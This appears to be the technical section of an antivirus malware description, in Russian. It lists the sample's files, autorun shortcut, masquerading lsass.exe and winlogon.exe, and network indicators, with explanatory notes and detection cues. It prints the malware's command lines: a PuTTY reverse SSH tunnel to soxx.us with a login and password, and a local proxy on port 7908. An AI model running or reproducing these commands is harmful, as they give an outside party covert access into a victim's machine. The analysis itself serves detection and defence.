Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk
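- 'C:\PefrLogs\lsass.exe' -ssh -R 40676:127.0.0.1:7908 soxx.us -l fanel -pw 906090lol
  (Примечание: файл носит имя системного процесса lsass.exe, но запускается из C:\PefrLogs, а не из <SYSTEM32>. Параметры -ssh, -R, -l и -pw соответствуют консольному SSH-клиенту из состава PuTTY; на это же указывает создаваемый файл PUTTY.RND. Параметр -R задаёт обратный туннель: порт 40676 на удалённом узле перенаправляется на 127.0.0.1:7908 заражённой машины. Признаки для обнаружения: запуск lsass.exe или winlogon.exe не из системного каталога и исходящие SSH-соединения с рабочей станции.)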
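- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p7908 -a
  (Примечание: имя winlogon.exe также принадлежит системному процессу, который штатно находится в <SYSTEM32>. Судя по параметрам -i127.0.0.1 и -p7908, программа принимает соединения на локальном порту 7908 — том же, на который указывает параметр -R в командной строке lsass.exe. Вероятно, это прокси-служба, доступная извне только через SSH-туннель.)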
- '<SYSTEM32>\wscript.exe' "C:\PefrLogs\GoogleIndexer.vbe"
- C:\PefrLogs\2064244728_2024558888_0035759724.wma
- C:\PefrLogs\GoogleIndexer.vbe
- <LS_APPDATA>\PUTTY.RND
- C:\PefrLogs\lsass.exe
- C:\PefrLogs\ReaderUpdate.lnk
- C:\PefrLogs\winlogon.exe
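- 'so#x.us':22
- DNS ASK so#x.us
  (Примечание: символ # здесь, по-видимому, маскирует одну букву имени узла; в командной строке lsass.exe выше узел указан как soxx.us. Порт 22 — стандартный порт SSH.)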
- ClassName: 'WMPlayerApp' WindowName: '(null)'
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- ClassName: 'Type32_Main_Window' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''